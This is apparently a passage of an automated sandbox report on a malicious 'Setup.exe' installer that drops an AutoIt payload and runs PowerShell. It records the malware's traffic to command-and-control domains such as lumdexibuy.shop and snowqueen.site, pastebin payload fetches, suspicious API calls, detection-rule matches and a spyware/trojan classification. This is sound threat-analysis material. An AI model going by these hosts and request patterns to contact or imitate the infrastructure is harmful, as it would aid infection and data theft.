            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005829BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,10_2_005829BA
            Source: global trafficHTTP traffic detected: GET /raw/erLX7UsT HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: pastebin.com
            Source: global trafficHTTP traffic detected: GET /4b882c8/script HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: silversky.club
            Source: global trafficDNS traffic detected: DNS query: GJNYzyvbesUVEaJQoujpar.GJNYzyvbesUVEaJQoujpar
            Source: global trafficDNS traffic detected: DNS query: lumdexibuy.shop
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: global trafficDNS traffic detected: DNS query: cdn1.pixel-story.shop
            Source: global trafficDNS traffic detected: DNS query: silversky.club
            Source: global trafficDNS traffic detected: DNS query: masa.r2cloudzugybyi8.shop
            Source: global trafficDNS traffic detected: DNS query: snowqueen.site
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lumdexibuy.shop
            Source: 'Setup.exeString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: 'Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: 'Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: 'Setup.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: 'Setup.exeString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: powershell.exe, 0000000E.00000002.2858459966.0000000006DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsofth
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: 'Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: 'Setup.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: 'Setup.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: 'Setup.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, 'Setup.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: 'Setup.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: 'Setup.exeString found in binary or memory: http://ocsp.entrust.net02
            Source: 'Setup.exeString found in binary or memory: http://ocsp.entrust.net03
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Contrast.com, 0000000A.00000000.2061244784.00000000005D9000.00000002.00000001.01000000.00000007.sdmp, Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: 'Setup.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: 'Setup.exeString found in binary or memory: http://www.entrust.net/rpa03
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Contrast.com, 0000000A.00000003.2589294104.00000000045AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://..queen.
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 0000000E.00000002.2849993578.0000000004621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2869363357.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBsq
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2866405600.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000011.00000002.2869363357.00000000055BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofD
            Source: powershell.exe, 0000000E.00000002.2848592531.00000000004C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofDz
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lumdexibuy.shop/(
            Source: Contrast.com, 0000000A.00000003.2503476917.0000000004548000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2677727697.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2677790488.000000000457C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lumdexibuy.shop/api
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lumdexibuy.shop/e
            Source: Contrast.com, 0000000A.00000003.2677892109.000000000453D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lumdexibuy.shop/ms
            Source: powershell.exe, 0000000E.00000002.2854486695.000000000567D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2876975056.0000000005E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowqueen.site
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmp, 5TM3JMZQCYKEYRKL75T8.ps1.10.drString found in binary or memory: https://snowqueen.site/calling.php?compName=
            Source: powershell.exe, 00000011.00000002.2869363357.0000000004F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowqueen.site/calling.php?compName=user-PC
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 'Setup.exeString found in binary or memory: https://www.entrust.net/rpa0
            Source: Set.0.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Contrast.com, 0000000A.00000003.2415242655.000000000484D000.00000004.00000800.00020000.00000000.sdmp, Contrast.com.2.dr, Set.0.drString found in binary or memory: https://www.globalsign.com/repository/06
            Source: Contrast.com, 0000000A.00000003.2503095233.00000000045A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: Contrast.com, 0000000A.00000003.2590273671.0000000005659000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49786 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49809 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49819 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49826 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.63.229:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49848 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.58.9:443 -> 192.168.2.5:49854 version: TLS 1.2
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00584830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00584830
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00584632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00584632
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0059D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_0059D164

            System Summary

            barindex
            Source: amsi32_980.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00574254: CreateFileW,DeviceIoControl,CloseHandle,10_2_00574254
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00568F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00568F2E
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00575778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00575778
            Source: C:\Users\user\Desktop\'Setup.exeFile created: C:\Windows\AnneBathsJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_0040737E0_2_0040737E
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406EFE0_2_00406EFE
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004079A20_2_004079A2
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004049A80_2_004049A8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0051B02010_2_0051B020
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005194E010_2_005194E0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00519C8010_2_00519C80
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005323F510_2_005323F5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0059840010_2_00598400
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0054650210_2_00546502
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0054265E10_2_0054265E
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0051E6F010_2_0051E6F0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053282A10_2_0053282A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005489BF10_2_005489BF
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00546A7410_2_00546A74
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00590A3A10_2_00590A3A
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00520BE010_2_00520BE0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053CD5110_2_0053CD51
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0056EDB210_2_0056EDB2
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00578E4410_2_00578E44
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00590EB710_2_00590EB7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00546FE610_2_00546FE6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005333B710_2_005333B7
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0052D45D10_2_0052D45D
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053F40910_2_0053F409
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0051166310_2_00511663
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0052F62810_2_0052F628
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005316B410_2_005316B4
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0051F6A010_2_0051F6A0
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_005378C310_2_005378C3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053DBA510_2_0053DBA5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00531BA810_2_00531BA8
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00549CE510_2_00549CE5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0052DD2810_2_0052DD28
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0053BFD610_2_0053BFD6
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00531FC010_2_00531FC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0410B35014_2_0410B350
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0410B34014_2_0410B340
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\108941\Contrast.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
            Source: C:\Users\user\Desktop\'Setup.exeCode function: String function: 004062CF appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: String function: 00521A36 appears 34 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: String function: 00538B30 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: String function: 00530D17 appears 70 times
            Source: 'Setup.exeStatic PE information: invalid certificate
            Source: 'Setup.exe, 00000000.00000002.2026036005.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 'Setup.exe
            Source: 'Setup.exe, 00000000.00000003.2024486838.00000000006D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 'Setup.exe
            Source: 'Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: amsi32_980.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/22@7/3
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057A6AD GetLastError,FormatMessageW,10_2_0057A6AD
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00568DE9 AdjustTokenPrivileges,CloseHandle,10_2_00568DE9
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00569399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00569399
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00574148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00574148
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0057443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,10_2_0057443D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
